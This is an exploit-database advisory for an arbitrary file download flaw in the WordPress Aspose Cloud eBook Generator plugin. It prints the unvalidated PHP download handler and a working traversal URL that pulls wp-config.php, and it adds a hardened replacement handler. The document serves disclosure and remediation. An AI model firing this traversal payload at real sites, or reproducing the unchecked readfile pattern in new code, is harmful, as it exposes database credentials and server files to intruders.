WordPress Aspose Cloud eBook Generator File Download Vulnerability

2015-03-28T00:00:00
ID 1337DAY-ID-23452
Type zdt
Reporter Acc3ss
Modified 2015-03-28T00:00:00

Description

WordPress Aspose Cloud eBook Generator plugin suffers from an arbitrary file download vulnerability.

                                        
                                            |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
  |-------------------------------------------------------------------------|
  | [+] Exploit Title:Wordpress Aspose-Cloud-eBook-Generator Plugin  
Arbitrary File Download Vulnerability |
  | [+] Exploit Author: Ashiyane Digital Security Team |
  | [+] Vendor Homepage :  
https://wordpress.org/plugins/aspose-cloud-ebook-generator/
  | [+] Download Link :  
https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip
  | [+] Tested on: Windows,Linux |
  | [+] Discovered By : ACC3SS
  |-------------------------------------------------------------------------|
  | [+] Exploit: |
  | [+] Vulnerable file :  
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php  
|
  | [+] Vulnerable Code :

<?php
// Untrusted input: the file path comes straight from the query string.
$file = $_GET['file'];

// Only the last path segment is used for the download name; the full,
// unvalidated path is still what gets read from disk below.
$file_arr = explode('/', $file);
$file_name = $file_arr[count($file_arr) - 1];

header("Content-type: octet/stream");
header("Content-disposition: attachment; filename=" . $file_name . ";");
header("Content-Length: " . filesize($file));

// No authentication, no base-directory check: any file the web server
// can read (e.g. via ../ traversal) is streamed back to the client.
readfile($file);
exit;
?>

  | [+] http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File Address] |
  | [+] |
  | [+] Examples: |
  | http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php |
  |-------------------------------------------------------------------------|
  |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
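As an added hardened counterpart (example code, not the plugin's own), a replacement for the download handler above that serves only bare file names resolving inside one fixed export directory; the directory constant, the extension allow-list and the error handling are assumptions, not taken from the plugin:

```php
<?php
// Added example, not the plugin's code. Exports are assumed to live in a
// dedicated directory (hypothetical constant); nothing outside it is served.
define('ASPOSE_EXPORT_DIR', __DIR__ . '/exports');

function resolve_export_path(string $requested, string $base_dir): ?string
{
    // Accept a bare file name only: any directory component, traversal
    // sequence or leading dot is rejected before touching the filesystem.
    $name = basename($requested);
    if ($name === '' || $name !== $requested || $name[0] === '.') {
        return null;
    }
    // Allow-list of output types (assumed set of generated e-book formats).
    if (!preg_match('/\.(pdf|epub|docx)$/i', $name)) {
        return null;
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . $name);
    // realpath() returns false for missing files and follows symlinks, so
    // the canonical path is prefix-checked against the canonical base.
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$path = resolve_export_path((string) ($_GET['file'] ?? ''), ASPOSE_EXPORT_DIR);
if ($path === null) {
    http_response_code(400);
    exit('Invalid file');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
exit;
```

This still answers unauthenticated requests; a handler like this belongs behind a WordPress capability check rather than being reachable as a stand-alone script.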

#  0day.today [2018-01-01]  #